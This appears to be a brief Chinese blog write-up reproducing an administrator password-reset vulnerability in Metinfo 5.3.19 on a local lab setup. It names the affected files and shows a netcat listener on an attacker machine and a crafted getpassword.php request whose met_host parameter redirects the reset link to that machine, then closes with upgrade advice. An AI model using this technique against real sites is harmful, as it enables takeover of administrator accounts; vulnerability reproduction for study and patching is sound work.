Metinfo 5.3.19管理员密码重置漏洞复现

 Metinfo 5.3.19管理员密码重置漏洞

 

 操作系统：Windows 10专业版   kali linux

 

 网站环境：UPUPW 5.3

 

 使用工具：burpsuite 1.7 beta

 

漏洞分析

#密码重置过程中验证不严

#漏洞涉及到的几个文件分别是：

admin/admin/getpassword.php

include/common.inc.php

include/jmail.php

include/export.func.php

 

 

安装（请忽略我用QQ浏览器）

 

 

 

upupw默认数据账户密码：root--root

漏洞复现

登陆localhost/metinfo/admin点击忘记密码

 

用burp抓包

在kali虚拟机上监听80端口

nc -lvvp 80

kali机器上IP为192.168.43.15

 

在burp repeater中构造http请求发送

POST /metinfo/admin/admin/getpassword.php?met_host=192.168.43.15

 

这时候在我们kali监听的80端口监听到了密码重置的链接

 打开链接进入设置密码界面

 我这里好几次没有监听到不知到是怎末回事重启了kali就可以了（计算机玄学吧有时候得信）

漏洞建议：

升级CMS版本

二次开发中优化登陆代码避免逻辑错误